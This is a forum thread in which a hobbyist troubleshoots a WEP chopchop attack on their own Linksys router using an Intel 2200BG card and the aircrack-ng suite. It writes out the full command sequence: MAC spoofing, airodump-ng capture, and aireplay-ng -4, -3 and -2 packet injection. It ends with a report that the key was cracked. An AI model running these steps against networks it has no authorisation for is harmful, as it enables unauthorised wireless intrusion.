ChopChop WEP attack with IPW2200
Hi all, hoping you guys can point me in the right direction. I have been successful searching the forums, but I realized that I often know what to type but not WHY I'm typing it. I have just recently begun to explore the recommended Slax guides also.
I am "attacking" from a dell laptop with an Intel 2200BG (yuck, I know). I managed to successfully dual boot BT2 with XP pro.
The target is my linksys wrt54g v2 running dd-wrt firmware (128bit key WEP). My wife's desktop is connected to the linksys to serve as the client.
Here's my process so far (using aircrack 0.9.1 if it matters):
modprobe ipw2200 rtap_iface=1
ifconfig eth1 up
ifconfig rtap0 up
#I think this creates rtap0 that I need to inject and listen. I also have no internet access until I do this. Why?
ifconfig eth1 up hw ether 00:11:22:33:44:55
#changes my MAC? Not really necessary (I don't yet Mac filter).
iwconfig eth1 essid <AP essid> channel <AP channel> key s:fakekey mode managed
#what does this accomplish?
airodump-ng --bssid <AP MAC> -w <dump file> rtap0
#begins listening with rtap0? The packet count begins climibing, but the data (IVs) stay very low (but I think this is normal with little/no traffic)
aireplay-ng -4 -a <AP MAC> -h <My "fake" MAC> -i rtap0 eth1
#begins reading packets (into the thousands).
This is where I get stuck. Isn't it supposed to eventually stop reading packets and ask if I want to "use this packet" (y or n)? I got it to do this once and continued on with packetforge -0 and aireplay -2 (IVs went soaring)!!!
Any insight as to what I am doing wrong?
If you read all these pages you will find that all of the commands are explained to an extent, and you should be able to see why the commands are strung together the way they are.
thanks for the direction. I managed to succesfully and repeatedly crack my wep with both -3 and -4 attacks this evening. Alot of my confusion stemmed from the 2200BG. I straightened out which interface should be listening, which should be sending, proper modes, etc and it began working.
Time to keep reading. Thanks